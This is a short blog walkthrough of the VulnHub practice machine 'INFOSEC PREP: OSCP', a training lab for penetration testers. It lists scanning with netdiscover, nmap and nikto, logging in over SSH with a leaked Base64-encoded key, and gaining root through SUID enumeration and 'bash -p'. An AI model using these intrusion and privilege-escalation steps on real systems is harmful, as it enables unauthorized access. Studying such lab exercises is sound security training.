INFOSEC PREP: OSCP -: (Vulnhub) Walkthrough

Pulkit Marele
3 min readApr 21, 2021

--

Today we’ll be continuing with our new machine on VulnHub. In this article, we will see a walkthrough of an interesting VulnHub machine called INFOSEC PREP: OSCP

Here is the link to downlaod this VM:-

https://www.vulnhub.com/entry/infosec-prep-oscp,508/

Network Scanning

We always start with network scanning, Let’s find the target IP address by running netdiscover.

┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0

As we saw in netdiscover result. Our target ip address is 192.168.187.229

Enumeration/Reconnaissance

Our next step is scanning the target machine. let’s start with nmap.

┌─[root@RDX]─[~]
└──╼ #nmap -v -sT -p- 192.168.187.229

With the help of nmap we are able to scan all open tcp ports
Starting with the port number 80 which is http,

┌─[✗]─[root@RDX]─[~]
└──╼ #nikto --url http://192.168.187.229

http://192.168.187.229/secret.txt

Looks like Base64. We decode:

https://www.base64decode.org/

┌─[root@RDX]─[~]
└──╼ #vim secret.txt

┌─[root@RDX]─[~]
└──╼ #chmod 600 secret.txt

┌─[root@RDX]─[~]
└──╼ #ssh -i secret.txt oscp@192.168.187.229

  • bash-5.0$ ls
  • bash-5.0$ cat id
  • bash-5.0$ id

Privilege Escalation

  • bash-5.0$ find / -perm -u=s -type f 2>/dev/null

bash-5.0$ ls /usr/bin/bash -l

bash-5.0$ bash -p

bash-5.0# id

bash-5.0# cd /root

bash-5.0# ls

bash-5.0# cat flag.txt

Successfully got the root privilege and the ‘flag.txt’ .

--

--